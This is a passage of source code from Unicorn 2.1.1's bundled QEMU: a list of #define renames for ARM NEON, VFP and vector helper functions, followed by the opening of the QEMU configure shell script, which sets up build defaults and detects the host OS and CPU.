helper_neon_addl_saturate_s32_arm #define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_arm #define helper_neon_abdl_u16 helper_neon_abdl_u16_arm #define helper_neon_abdl_s16 
helper_neon_abdl_s16_arm #define helper_neon_abdl_u32 helper_neon_abdl_u32_arm #define helper_neon_abdl_s32 helper_neon_abdl_s32_arm #define helper_neon_abdl_u64 helper_neon_abdl_u64_arm #define helper_neon_abdl_s64 helper_neon_abdl_s64_arm #define helper_neon_mull_u8 helper_neon_mull_u8_arm #define helper_neon_mull_s8 helper_neon_mull_s8_arm #define helper_neon_mull_u16 helper_neon_mull_u16_arm #define helper_neon_mull_s16 helper_neon_mull_s16_arm #define helper_neon_negl_u16 helper_neon_negl_u16_arm #define helper_neon_negl_u32 helper_neon_negl_u32_arm #define helper_neon_qabs_s8 helper_neon_qabs_s8_arm #define helper_neon_qneg_s8 helper_neon_qneg_s8_arm #define helper_neon_qabs_s16 helper_neon_qabs_s16_arm #define helper_neon_qneg_s16 helper_neon_qneg_s16_arm #define helper_neon_qabs_s32 helper_neon_qabs_s32_arm #define helper_neon_qneg_s32 helper_neon_qneg_s32_arm #define helper_neon_qabs_s64 helper_neon_qabs_s64_arm #define helper_neon_qneg_s64 helper_neon_qneg_s64_arm #define helper_neon_abd_f32 helper_neon_abd_f32_arm #define helper_neon_ceq_f32 helper_neon_ceq_f32_arm #define helper_neon_cge_f32 helper_neon_cge_f32_arm #define helper_neon_cgt_f32 helper_neon_cgt_f32_arm #define helper_neon_acge_f32 helper_neon_acge_f32_arm #define helper_neon_acgt_f32 helper_neon_acgt_f32_arm #define helper_neon_acge_f64 helper_neon_acge_f64_arm #define helper_neon_acgt_f64 helper_neon_acgt_f64_arm #define helper_neon_qunzip8 helper_neon_qunzip8_arm #define helper_neon_qunzip16 helper_neon_qunzip16_arm #define helper_neon_qunzip32 helper_neon_qunzip32_arm #define helper_neon_unzip8 helper_neon_unzip8_arm #define helper_neon_unzip16 helper_neon_unzip16_arm #define helper_neon_qzip8 helper_neon_qzip8_arm #define helper_neon_qzip16 helper_neon_qzip16_arm #define helper_neon_qzip32 helper_neon_qzip32_arm #define helper_neon_zip8 helper_neon_zip8_arm #define helper_neon_zip16 helper_neon_zip16_arm #define raise_exception raise_exception_arm #define raise_exception_ra raise_exception_ra_arm #define helper_neon_tbl helper_neon_tbl_arm #define helper_v8m_stackcheck helper_v8m_stackcheck_arm #define helper_add_setq helper_add_setq_arm #define helper_add_saturate helper_add_saturate_arm #define helper_sub_saturate helper_sub_saturate_arm #define helper_add_usaturate helper_add_usaturate_arm #define helper_sub_usaturate helper_sub_usaturate_arm #define helper_ssat helper_ssat_arm #define helper_ssat16 helper_ssat16_arm #define helper_usat helper_usat_arm #define helper_usat16 helper_usat16_arm #define helper_setend helper_setend_arm #define helper_wfi helper_wfi_arm #define helper_wfe helper_wfe_arm #define helper_yield helper_yield_arm #define helper_exception_internal helper_exception_internal_arm #define helper_exception_with_syndrome helper_exception_with_syndrome_arm #define helper_exception_bkpt_insn helper_exception_bkpt_insn_arm #define helper_cpsr_read helper_cpsr_read_arm #define helper_cpsr_write helper_cpsr_write_arm #define helper_cpsr_write_eret helper_cpsr_write_eret_arm #define helper_get_user_reg helper_get_user_reg_arm #define helper_set_user_reg helper_set_user_reg_arm #define helper_set_r13_banked helper_set_r13_banked_arm #define helper_get_r13_banked helper_get_r13_banked_arm #define helper_msr_banked helper_msr_banked_arm #define helper_mrs_banked helper_mrs_banked_arm #define helper_access_check_cp_reg helper_access_check_cp_reg_arm #define helper_set_cp_reg helper_set_cp_reg_arm #define helper_get_cp_reg helper_get_cp_reg_arm #define helper_set_cp_reg64 helper_set_cp_reg64_arm #define 
helper_get_cp_reg64 helper_get_cp_reg64_arm #define helper_pre_hvc helper_pre_hvc_arm #define helper_pre_smc helper_pre_smc_arm #define helper_shl_cc helper_shl_cc_arm #define helper_shr_cc helper_shr_cc_arm #define helper_sar_cc helper_sar_cc_arm #define helper_ror_cc helper_ror_cc_arm #define arm_is_psci_call arm_is_psci_call_arm #define arm_handle_psci_call arm_handle_psci_call_arm #define arm_cpu_do_unaligned_access arm_cpu_do_unaligned_access_arm #define arm_cpu_do_transaction_failed arm_cpu_do_transaction_failed_arm #define arm_cpu_tlb_fill arm_cpu_tlb_fill_arm #define arm_translate_init arm_translate_init_arm #define arm_test_cc arm_test_cc_arm #define arm_free_cc arm_free_cc_arm #define arm_jump_cc arm_jump_cc_arm #define arm_gen_test_cc arm_gen_test_cc_arm #define vfp_expand_imm vfp_expand_imm_arm #define gen_cmtst_i64 gen_cmtst_i64_arm #define gen_ushl_i32 gen_ushl_i32_arm #define gen_ushl_i64 gen_ushl_i64_arm #define gen_sshl_i32 gen_sshl_i32_arm #define gen_sshl_i64 gen_sshl_i64_arm #define gen_intermediate_code gen_intermediate_code_arm #define restore_state_to_opc restore_state_to_opc_arm #define helper_neon_qrdmlah_s16 helper_neon_qrdmlah_s16_arm #define helper_gvec_qrdmlah_s16 helper_gvec_qrdmlah_s16_arm #define helper_neon_qrdmlsh_s16 helper_neon_qrdmlsh_s16_arm #define helper_gvec_qrdmlsh_s16 helper_gvec_qrdmlsh_s16_arm #define helper_neon_qrdmlah_s32 helper_neon_qrdmlah_s32_arm #define helper_gvec_qrdmlah_s32 helper_gvec_qrdmlah_s32_arm #define helper_neon_qrdmlsh_s32 helper_neon_qrdmlsh_s32_arm #define helper_gvec_qrdmlsh_s32 helper_gvec_qrdmlsh_s32_arm #define helper_gvec_sdot_b helper_gvec_sdot_b_arm #define helper_gvec_udot_b helper_gvec_udot_b_arm #define helper_gvec_sdot_h helper_gvec_sdot_h_arm #define helper_gvec_udot_h helper_gvec_udot_h_arm #define helper_gvec_sdot_idx_b helper_gvec_sdot_idx_b_arm #define helper_gvec_udot_idx_b helper_gvec_udot_idx_b_arm #define helper_gvec_sdot_idx_h helper_gvec_sdot_idx_h_arm #define helper_gvec_udot_idx_h helper_gvec_udot_idx_h_arm #define helper_gvec_fcaddh helper_gvec_fcaddh_arm #define helper_gvec_fcadds helper_gvec_fcadds_arm #define helper_gvec_fcaddd helper_gvec_fcaddd_arm #define helper_gvec_fcmlah helper_gvec_fcmlah_arm #define helper_gvec_fcmlah_idx helper_gvec_fcmlah_idx_arm #define helper_gvec_fcmlas helper_gvec_fcmlas_arm #define helper_gvec_fcmlas_idx helper_gvec_fcmlas_idx_arm #define helper_gvec_fcmlad helper_gvec_fcmlad_arm #define helper_gvec_frecpe_h helper_gvec_frecpe_h_arm #define helper_gvec_frecpe_s helper_gvec_frecpe_s_arm #define helper_gvec_frecpe_d helper_gvec_frecpe_d_arm #define helper_gvec_frsqrte_h helper_gvec_frsqrte_h_arm #define helper_gvec_frsqrte_s helper_gvec_frsqrte_s_arm #define helper_gvec_frsqrte_d helper_gvec_frsqrte_d_arm #define helper_gvec_fadd_h helper_gvec_fadd_h_arm #define helper_gvec_fadd_s helper_gvec_fadd_s_arm #define helper_gvec_fadd_d helper_gvec_fadd_d_arm #define helper_gvec_fsub_h helper_gvec_fsub_h_arm #define helper_gvec_fsub_s helper_gvec_fsub_s_arm #define helper_gvec_fsub_d helper_gvec_fsub_d_arm #define helper_gvec_fmul_h helper_gvec_fmul_h_arm #define helper_gvec_fmul_s helper_gvec_fmul_s_arm #define helper_gvec_fmul_d helper_gvec_fmul_d_arm #define helper_gvec_ftsmul_h helper_gvec_ftsmul_h_arm #define helper_gvec_ftsmul_s helper_gvec_ftsmul_s_arm #define helper_gvec_ftsmul_d helper_gvec_ftsmul_d_arm #define helper_gvec_fmul_idx_h helper_gvec_fmul_idx_h_arm #define helper_gvec_fmul_idx_s helper_gvec_fmul_idx_s_arm #define helper_gvec_fmul_idx_d 
helper_gvec_fmul_idx_d_arm #define helper_gvec_fmla_idx_h helper_gvec_fmla_idx_h_arm #define helper_gvec_fmla_idx_s helper_gvec_fmla_idx_s_arm #define helper_gvec_fmla_idx_d helper_gvec_fmla_idx_d_arm #define helper_gvec_uqadd_b helper_gvec_uqadd_b_arm #define helper_gvec_uqadd_h helper_gvec_uqadd_h_arm #define helper_gvec_uqadd_s helper_gvec_uqadd_s_arm #define helper_gvec_sqadd_b helper_gvec_sqadd_b_arm #define helper_gvec_sqadd_h helper_gvec_sqadd_h_arm #define helper_gvec_sqadd_s helper_gvec_sqadd_s_arm #define helper_gvec_uqsub_b helper_gvec_uqsub_b_arm #define helper_gvec_uqsub_h helper_gvec_uqsub_h_arm #define helper_gvec_uqsub_s helper_gvec_uqsub_s_arm #define helper_gvec_sqsub_b helper_gvec_sqsub_b_arm #define helper_gvec_sqsub_h helper_gvec_sqsub_h_arm #define helper_gvec_sqsub_s helper_gvec_sqsub_s_arm #define helper_gvec_uqadd_d helper_gvec_uqadd_d_arm #define helper_gvec_uqsub_d helper_gvec_uqsub_d_arm #define helper_gvec_sqadd_d helper_gvec_sqadd_d_arm #define helper_gvec_sqsub_d helper_gvec_sqsub_d_arm #define helper_gvec_fmlal_a32 helper_gvec_fmlal_a32_arm #define helper_gvec_fmlal_a64 helper_gvec_fmlal_a64_arm #define helper_gvec_fmlal_idx_a32 helper_gvec_fmlal_idx_a32_arm #define helper_gvec_fmlal_idx_a64 helper_gvec_fmlal_idx_a64_arm #define helper_gvec_sshl_b helper_gvec_sshl_b_arm #define helper_gvec_sshl_h helper_gvec_sshl_h_arm #define helper_gvec_ushl_b helper_gvec_ushl_b_arm #define helper_gvec_ushl_h helper_gvec_ushl_h_arm #define helper_gvec_pmul_b helper_gvec_pmul_b_arm #define helper_gvec_pmull_q helper_gvec_pmull_q_arm #define helper_neon_pmull_h helper_neon_pmull_h_arm #define helper_vfp_get_fpscr helper_vfp_get_fpscr_arm #define vfp_get_fpscr vfp_get_fpscr_arm #define helper_vfp_set_fpscr helper_vfp_set_fpscr_arm #define vfp_set_fpscr vfp_set_fpscr_arm #define helper_vfp_adds helper_vfp_adds_arm #define helper_vfp_addd helper_vfp_addd_arm #define helper_vfp_subs helper_vfp_subs_arm #define helper_vfp_subd helper_vfp_subd_arm #define helper_vfp_muls helper_vfp_muls_arm #define helper_vfp_muld helper_vfp_muld_arm #define helper_vfp_divs helper_vfp_divs_arm #define helper_vfp_divd helper_vfp_divd_arm #define helper_vfp_mins helper_vfp_mins_arm #define helper_vfp_mind helper_vfp_mind_arm #define helper_vfp_maxs helper_vfp_maxs_arm #define helper_vfp_maxd helper_vfp_maxd_arm #define helper_vfp_minnums helper_vfp_minnums_arm #define helper_vfp_minnumd helper_vfp_minnumd_arm #define helper_vfp_maxnums helper_vfp_maxnums_arm #define helper_vfp_maxnumd helper_vfp_maxnumd_arm #define helper_vfp_negs helper_vfp_negs_arm #define helper_vfp_negd helper_vfp_negd_arm #define helper_vfp_abss helper_vfp_abss_arm #define helper_vfp_absd helper_vfp_absd_arm #define helper_vfp_sqrts helper_vfp_sqrts_arm #define helper_vfp_sqrtd helper_vfp_sqrtd_arm #define helper_vfp_cmps helper_vfp_cmps_arm #define helper_vfp_cmpes helper_vfp_cmpes_arm #define helper_vfp_cmpd helper_vfp_cmpd_arm #define helper_vfp_cmped helper_vfp_cmped_arm #define helper_vfp_sitoh helper_vfp_sitoh_arm #define helper_vfp_tosih helper_vfp_tosih_arm #define helper_vfp_tosizh helper_vfp_tosizh_arm #define helper_vfp_sitos helper_vfp_sitos_arm #define helper_vfp_tosis helper_vfp_tosis_arm #define helper_vfp_tosizs helper_vfp_tosizs_arm #define helper_vfp_sitod helper_vfp_sitod_arm #define helper_vfp_tosid helper_vfp_tosid_arm #define helper_vfp_tosizd helper_vfp_tosizd_arm #define helper_vfp_uitoh helper_vfp_uitoh_arm #define helper_vfp_touih helper_vfp_touih_arm #define helper_vfp_touizh helper_vfp_touizh_arm 
#define helper_vfp_uitos helper_vfp_uitos_arm #define helper_vfp_touis helper_vfp_touis_arm #define helper_vfp_touizs helper_vfp_touizs_arm #define helper_vfp_uitod helper_vfp_uitod_arm #define helper_vfp_touid helper_vfp_touid_arm #define helper_vfp_touizd helper_vfp_touizd_arm #define helper_vfp_fcvtds helper_vfp_fcvtds_arm #define helper_vfp_fcvtsd helper_vfp_fcvtsd_arm #define helper_vfp_shtod helper_vfp_shtod_arm #define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_arm #define helper_vfp_toshd helper_vfp_toshd_arm #define helper_vfp_sltod helper_vfp_sltod_arm #define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_arm #define helper_vfp_tosld helper_vfp_tosld_arm #define helper_vfp_sqtod helper_vfp_sqtod_arm #define helper_vfp_tosqd helper_vfp_tosqd_arm #define helper_vfp_uhtod helper_vfp_uhtod_arm #define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_arm #define helper_vfp_touhd helper_vfp_touhd_arm #define helper_vfp_ultod helper_vfp_ultod_arm #define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_arm #define helper_vfp_tould helper_vfp_tould_arm #define helper_vfp_uqtod helper_vfp_uqtod_arm #define helper_vfp_touqd helper_vfp_touqd_arm #define helper_vfp_shtos helper_vfp_shtos_arm #define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_arm #define helper_vfp_toshs helper_vfp_toshs_arm #define helper_vfp_sltos helper_vfp_sltos_arm #define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_arm #define helper_vfp_tosls helper_vfp_tosls_arm #define helper_vfp_sqtos helper_vfp_sqtos_arm #define helper_vfp_tosqs helper_vfp_tosqs_arm #define helper_vfp_uhtos helper_vfp_uhtos_arm #define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_arm #define helper_vfp_touhs helper_vfp_touhs_arm #define helper_vfp_ultos helper_vfp_ultos_arm #define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_arm #define helper_vfp_touls helper_vfp_touls_arm #define helper_vfp_uqtos helper_vfp_uqtos_arm #define helper_vfp_touqs helper_vfp_touqs_arm #define helper_vfp_sltoh helper_vfp_sltoh_arm #define helper_vfp_ultoh helper_vfp_ultoh_arm #define helper_vfp_sqtoh helper_vfp_sqtoh_arm #define helper_vfp_uqtoh helper_vfp_uqtoh_arm #define helper_vfp_toshh helper_vfp_toshh_arm #define helper_vfp_touhh helper_vfp_touhh_arm #define helper_vfp_toslh helper_vfp_toslh_arm #define helper_vfp_toulh helper_vfp_toulh_arm #define helper_vfp_tosqh helper_vfp_tosqh_arm #define helper_vfp_touqh helper_vfp_touqh_arm #define helper_set_rmode helper_set_rmode_arm #define helper_set_neon_rmode helper_set_neon_rmode_arm #define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_arm #define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_arm #define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_arm #define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_arm #define helper_recps_f32 helper_recps_f32_arm #define helper_rsqrts_f32 helper_rsqrts_f32_arm #define helper_recpe_f16 helper_recpe_f16_arm #define helper_recpe_f32 helper_recpe_f32_arm #define helper_recpe_f64 helper_recpe_f64_arm #define helper_rsqrte_f16 helper_rsqrte_f16_arm #define helper_rsqrte_f32 helper_rsqrte_f32_arm #define helper_rsqrte_f64 helper_rsqrte_f64_arm #define helper_recpe_u32 helper_recpe_u32_arm #define helper_rsqrte_u32 helper_rsqrte_u32_arm #define helper_vfp_muladds helper_vfp_muladds_arm #define helper_vfp_muladdd helper_vfp_muladdd_arm #define helper_rints_exact helper_rints_exact_arm #define helper_rintd_exact 
helper_rintd_exact_arm #define helper_rints helper_rints_arm #define helper_rintd helper_rintd_arm #define arm_rmode_to_sf arm_rmode_to_sf_arm #define helper_fjcvtzs helper_fjcvtzs_arm #define helper_vjcvt helper_vjcvt_arm #define helper_frint32_s helper_frint32_s_arm #define helper_frint64_s helper_frint64_s_arm #define helper_frint32_d helper_frint32_d_arm #define helper_frint64_d helper_frint64_d_arm #define helper_check_hcr_el2_trap helper_check_hcr_el2_trap_arm #define mla_op mla_op_arm #define mls_op mls_op_arm #define sshl_op sshl_op_arm #define ushl_op ushl_op_arm #define uqsub_op uqsub_op_arm #define sqsub_op sqsub_op_arm #define uqadd_op uqadd_op_arm #define sqadd_op sqadd_op_arm #define sli_op sli_op_arm #define cmtst_op cmtst_op_arm #define sri_op sri_op_arm #define usra_op usra_op_arm #define ssra_op ssra_op_arm #endif
unicorn-2.1.1/qemu/configure
#!/bin/sh # # qemu configure script (c) 2003 Fabrice Bellard # # Unset some variables known to interfere with behavior of common tools, # just as autoconf does. CLICOLOR_FORCE= GREP_OPTIONS= unset CLICOLOR_FORCE GREP_OPTIONS # Don't allow CCACHE, if present, to use cached results of compile tests! export CCACHE_RECACHE=yes # Temporary directory used for files created while # configure runs. Since it is in the build directory # we can safely blow away any previous version of it # (and we need not jump through hoops to try to delete # it when configure exits.) TMPDIR1="config-temp" rm -rf "${TMPDIR1}" mkdir -p "${TMPDIR1}" if [ $? -ne 0 ]; then echo "ERROR: failed to create temporary directory" exit 1 fi TMPB="qemu-conf" TMPC="${TMPDIR1}/${TMPB}.c" TMPO="${TMPDIR1}/${TMPB}.o" TMPCXX="${TMPDIR1}/${TMPB}.cxx" TMPE="${TMPDIR1}/${TMPB}.exe" TMPMO="${TMPDIR1}/${TMPB}.mo" TMPTXT="${TMPDIR1}/${TMPB}.txt" rm -f config.log # Print a helpful header at the top of config.log echo "# QEMU configure log $(date)" >> config.log printf "# Configured with:" >> config.log printf " '%s'" "$0" "$@" >> config.log echo >> config.log echo "#" >> config.log print_error() { (echo echo "ERROR: $1" while test -n "$2"; do echo " $2" shift done echo) >&2 } error_exit() { print_error "$@" exit 1 } do_compiler() { # Run the compiler, capturing its output to the log. First argument # is compiler binary to execute. local compiler="$1" shift if test -n "$BASH_VERSION"; then eval ' echo >>config.log " funcs: ${FUNCNAME[*]} lines: ${BASH_LINENO[*]}" '; fi echo $compiler "$@" >> config.log $compiler "$@" >> config.log 2>&1 || return $? # Test passed. If this is an --enable-werror build, rerun # the test with -Werror and bail out if it fails. This # makes warning-generating-errors in configure test code # obvious to developers.
if test "$werror" != "yes"; then return 0 fi # Don't bother rerunning the compile if we were already using -Werror case "$*" in *-Werror*) return 0 ;; esac echo $compiler -Werror "$@" >> config.log $compiler -Werror "$@" >> config.log 2>&1 && return $? error_exit "configure test passed without -Werror but failed with -Werror." \ "This is probably a bug in the configure script. The failing command" \ "will be at the bottom of config.log." \ "You can run configure with --disable-werror to bypass this check." } do_cc() { do_compiler "$cc" "$@" } do_cxx() { do_compiler "$cxx" "$@" } update_cxxflags() { # Set QEMU_CXXFLAGS from QEMU_CFLAGS by filtering out those # options which some versions of GCC's C++ compiler complain about # because they only make sense for C programs. QEMU_CXXFLAGS="$QEMU_CXXFLAGS -D__STDC_LIMIT_MACROS -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS" for arg in $QEMU_CFLAGS; do case $arg in -Wstrict-prototypes|-Wmissing-prototypes|-Wnested-externs|\ -Wold-style-declaration|-Wold-style-definition|-Wredundant-decls) ;; -std=gnu99) QEMU_CXXFLAGS=${QEMU_CXXFLAGS:+$QEMU_CXXFLAGS }"-std=gnu++98" ;; *) QEMU_CXXFLAGS=${QEMU_CXXFLAGS:+$QEMU_CXXFLAGS }$arg ;; esac done } compile_object() { local_cflags="$1" do_cc $QEMU_CFLAGS $local_cflags -c -o $TMPO $TMPC } compile_prog() { local_cflags="$1" local_ldflags="$2" do_cc $QEMU_CFLAGS $local_cflags -o $TMPE $TMPC $QEMU_LDFLAGS $local_ldflags } # symbolically link $1 to $2. Portable version of "ln -sf". symlink() { rm -rf "$2" mkdir -p "$(dirname "$2")" ln -s "$1" "$2" } # check whether a command is available to this shell (may be either an # executable or a builtin) has() { type "$1" >/dev/null 2>&1 } # search for an executable in PATH path_of() { local_command="$1" local_ifs="$IFS" local_dir="" # pathname has a dir component? if [ "${local_command#*/}" != "$local_command" ]; then if [ -x "$local_command" ] && [ ! -d "$local_command" ]; then echo "$local_command" return 0 fi fi if [ -z "$local_command" ]; then return 1 fi IFS=: for local_dir in $PATH; do if [ -x "$local_dir/$local_command" ] && [ ! -d "$local_dir/$local_command" ]; then echo "$local_dir/$local_command" IFS="${local_ifs:-$(printf ' \t\n')}" return 0 fi done # not found IFS="${local_ifs:-$(printf ' \t\n')}" return 1 } glob() { eval test -z '"${1#'"$2"'}"' } supported_target() { case "$1" in *-softmmu) ;; *) print_error "Invalid target name '$target'" return 1 ;; esac test "$tcg" = "yes" && return 0 print_error "TCG disabled, but hardware accelerator not available for '$target'" return 1 } ld_has() { $ld --help 2>/dev/null | grep ".$1" >/dev/null 2>&1 } # make source path absolute source_path=$(cd "$(dirname -- "$0")"; pwd) if printf %s\\n "$source_path" "$PWD" | grep -q "[[:space:]:]"; then error_exit "main directory cannot contain spaces nor colons" fi # default parameters cpu="" iasl="iasl" interp_prefix="/usr/gnemul/qemu-%M" static="no" cross_prefix="" host_cc="cc" libs_cpu="" libs_softmmu="" libs_tools="" debug_info="yes" stack_protector="" git_update=no git_submodules="" git="git" # Don't accept a target_list environment variable. unset target_list unset target_list_exclude # Default value for a variable defining feature "foo". # * foo="no" feature will only be used if --enable-foo arg is given # * foo="" feature will be searched for, and if found, will be used # unless --disable-foo is given # * foo="yes" this value will only be set by --enable-foo flag. 
# feature will be searched for, # if not found, configure exits with error # # Always add --enable-foo and --disable-foo command line args. # Distributions want to ensure that several features are compiled in, and it # is impossible without a --enable-foo that exits if a feature is not found. tcg="yes" membarrier="" debug="no" sanitizers="no" strip_opt="yes" bigendian="no" mingw32="no" EXESUF="" DSOSUF=".so" LDFLAGS_SHARED="-shared" prefix="/usr/local" bindir="\${prefix}/bin" libdir="\${prefix}/lib" libexecdir="\${prefix}/libexec" includedir="\${prefix}/include" sysconfdir="\${prefix}/etc" local_statedir="\${prefix}/var" confsuffix="/qemu" bsd="no" linux="no" solaris="no" softmmu="yes" pkgversion="" pie="" cpuid_h="no" avx2_opt="" debug_stack_usage="no" gtk_gl="no" tcmalloc="no" jemalloc="no" supported_cpu="no" supported_os="no" bogus_os="no" malloc_trim="" # parse CC options first for opt do optarg=$(expr "x$opt" : 'x[^=]*=\(.*\)') case "$opt" in --cross-prefix=*) cross_prefix="$optarg" ;; --cc=*) CC="$optarg" ;; --cxx=*) CXX="$optarg" ;; --cpu=*) cpu="$optarg" ;; --extra-cflags=*) QEMU_CFLAGS="$QEMU_CFLAGS $optarg" QEMU_LDFLAGS="$QEMU_LDFLAGS $optarg" ;; --extra-cxxflags=*) QEMU_CXXFLAGS="$QEMU_CXXFLAGS $optarg" ;; --extra-ldflags=*) QEMU_LDFLAGS="$QEMU_LDFLAGS $optarg" EXTRA_LDFLAGS="$optarg" ;; --enable-debug-info) debug_info="yes" ;; --disable-debug-info) debug_info="no" ;; --cross-cc-*[!a-zA-Z0-9_-]*=*) error_exit "Passed bad --cross-cc-FOO option" ;; --cross-cc-cflags-*) cc_arch=${opt#--cross-cc-cflags-}; cc_arch=${cc_arch%%=*} eval "cross_cc_cflags_${cc_arch}=\$optarg" cross_cc_vars="$cross_cc_vars cross_cc_cflags_${cc_arch}" ;; --cross-cc-*) cc_arch=${opt#--cross-cc-}; cc_arch=${cc_arch%%=*} cc_archs="$cc_archs $cc_arch" eval "cross_cc_${cc_arch}=\$optarg" cross_cc_vars="$cross_cc_vars cross_cc_${cc_arch}" ;; esac done # OS specific # Using uname is really, really broken. Once we have the right set of checks # we can eliminate its usage altogether. # Preferred compiler: # ${CC} (if set) # ${cross_prefix}gcc (if cross-prefix specified) # system compiler if test -z "${CC}${cross_prefix}"; then cc="$host_cc" else cc="${CC-${cross_prefix}gcc}" fi if test -z "${CXX}${cross_prefix}"; then cxx="c++" else cxx="${CXX-${cross_prefix}g++}" fi ar="${AR-${cross_prefix}ar}" as="${AS-${cross_prefix}as}" ccas="${CCAS-$cc}" cpp="${CPP-$cc -E}" objcopy="${OBJCOPY-${cross_prefix}objcopy}" ld="${LD-${cross_prefix}ld}" ranlib="${RANLIB-${cross_prefix}ranlib}" nm="${NM-${cross_prefix}nm}" strip="${STRIP-${cross_prefix}strip}" pkg_config_exe="${PKG_CONFIG-${cross_prefix}pkg-config}" query_pkg_config() { "${pkg_config_exe}" ${QEMU_PKG_CONFIG_FLAGS} "$@" } pkg_config=query_pkg_config # If the user hasn't specified ARFLAGS, default to 'rv', just as make does. ARFLAGS="${ARFLAGS-rv}" # default flags for all hosts # We use -fwrapv to tell the compiler that we require a C dialect where # left shift of signed integers is well defined and has the expected # 2s-complement style results. (Both clang and gcc agree that it # provides these semantics.) QEMU_CFLAGS="-fno-strict-aliasing -fno-common -fwrapv -std=gnu99 $QEMU_CFLAGS" QEMU_CFLAGS="-Wall -Wundef -Wwrite-strings -Wmissing-prototypes $QEMU_CFLAGS" QEMU_CFLAGS="-Wstrict-prototypes -Wredundant-decls $QEMU_CFLAGS" QEMU_CFLAGS="-D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE $QEMU_CFLAGS" QEMU_INCLUDES="-iquote .
-iquote \$(SRC_PATH) -iquote \$(SRC_PATH)/accel/tcg -iquote \$(SRC_PATH)/include" QEMU_INCLUDES="$QEMU_INCLUDES -iquote \$(SRC_PATH)/disas/libvixl" if test "$debug_info" = "yes"; then CFLAGS="-g $CFLAGS" fi # running configure in the source tree? # we know that's the case if configure is there. if test -f "./configure"; then pwd_is_source_path="y" else pwd_is_source_path="n" fi check_define() { cat > $TMPC <<EOF #if !defined($1) #error $1 not defined #endif int main(void) { return 0; } EOF compile_object } check_include() { cat > $TMPC <<EOF #include <$1> int main(void) { return 0; } EOF compile_object } write_c_skeleton() { cat > $TMPC <<EOF int main(void) { return 0; } EOF } if check_define __linux__ ; then targetos="Linux" elif check_define _WIN32 ; then targetos='MINGW32' elif check_define __OpenBSD__ ; then targetos='OpenBSD' elif check_define __sun__ ; then targetos='SunOS' elif check_define __HAIKU__ ; then targetos='Haiku' elif check_define __FreeBSD__ ; then targetos='FreeBSD' elif check_define __FreeBSD_kernel__ && check_define __GLIBC__; then targetos='GNU/kFreeBSD' elif check_define __DragonFly__ ; then targetos='DragonFly' elif check_define __NetBSD__; then targetos='NetBSD' elif check_define __APPLE__; then targetos='Darwin' else # This is a fatal error, but don't report it yet, because we # might be going to just print the --help text, or it might # be the result of a missing compiler. targetos='bogus' bogus_os='yes' fi # Some host OSes need non-standard checks for which CPU to use. # Note that these checks are broken for cross-compilation: if you're # cross-compiling to one of these OSes then you'll need to specify # the correct CPU with the --cpu option. case $targetos in Darwin) # on Leopard most of the system is 32-bit, so we have to ask the kernel if we can # run 64-bit userspace code. # If the user didn't specify a CPU explicitly and the kernel says this is # 64 bit hw, then assume x86_64. Otherwise fall through to the usual detection code. if test -z "$cpu" && test "$(sysctl -n hw.optional.x86_64)" = "1"; then cpu="x86_64" fi ;; SunOS) # $(uname -m) returns i86pc even on an x86_64 box, so default based on isainfo if test -z "$cpu" && test "$(isainfo -k)" = "amd64"; then cpu="x86_64" fi esac if test ! -z "$cpu" ; then # command line argument : elif check_define __i386__ ; then cpu="i386" elif check_define __x86_64__ ; then if check_define __ILP32__ ; then cpu="x32" else cpu="x86_64" fi elif check_define __sparc__ ; then if check_define __arch64__ ; then cpu="sparc64" else cpu="sparc" fi elif check_define _ARCH_PPC ; then if check_define _ARCH_PPC64 ; then if check_define _LITTLE_ENDIAN ; then cpu="ppc64le" else cpu="ppc64" fi else cpu="ppc" fi elif check_define __mips__ ; then cpu="mips" elif check_define __s390__ ; then if check_define __s390x__ ; then cpu="s390x" else cpu="s390" fi elif check_define __riscv ; then if check_define _LP64 ; then cpu="riscv64" else cpu="riscv32" fi elif check_define __arm__ ; then cpu="arm" elif check_define __aarch64__ ; then cpu="aarch64" elif check_define __tricore__ ; then cpu="tricore" else cpu=$(uname -m) fi ARCH= # Normalise host CPU name and set ARCH. # Note that this case should only have supported host CPUs, not guests. 
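# As an illustration of what the normalisation buys us (the authoritative
# mapping is the case statement below): the many spellings reported by
# compilers and kernels, e.g. i486/i586/i686/i86pc, amd64 or armv7l, all
# collapse to one canonical name (i386, x86_64, arm), so later probes can
# test the single canonical value, as in this simplified sketch of a check
# that appears further on:
#   if test "$cpu" = "i386"; then QEMU_CFLAGS="-march=i486 $QEMU_CFLAGS"; fi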
case "$cpu" in ppc|ppc64|s390x|sparc64|x32|riscv32|riscv64) supported_cpu="yes" ;; ppc64le) ARCH="ppc64" supported_cpu="yes" ;; i386|i486|i586|i686|i86pc|BePC) cpu="i386" supported_cpu="yes" ;; x86_64|amd64) cpu="x86_64" supported_cpu="yes" ;; armv*b|armv*l|arm) cpu="arm" supported_cpu="yes" ;; aarch64) cpu="aarch64" supported_cpu="yes" ;; mips*) cpu="mips" supported_cpu="yes" ;; sparc|sun4[cdmuv]) cpu="sparc" supported_cpu="yes" ;; tricore) cpu="tricore" supported_cpu="yes" ;; *) # This will result in either an error or falling back to TCI later ARCH=unknown ;; esac if test -z "$ARCH"; then ARCH="$cpu" fi # OS specific # host *BSD for user mode HOST_VARIANT_DIR="" case $targetos in MINGW32*) mingw32="yes" supported_os="yes" pie="no" ;; GNU/kFreeBSD) bsd="yes" ;; FreeBSD) bsd="yes" make="${MAKE-gmake}" # needed for kinfo_getvmmap(3) in libutil.h LIBS="-lutil $LIBS" # needed for kinfo_getproc HOST_VARIANT_DIR="freebsd" supported_os="yes" ;; DragonFly) bsd="yes" make="${MAKE-gmake}" HOST_VARIANT_DIR="dragonfly" ;; NetBSD) bsd="yes" 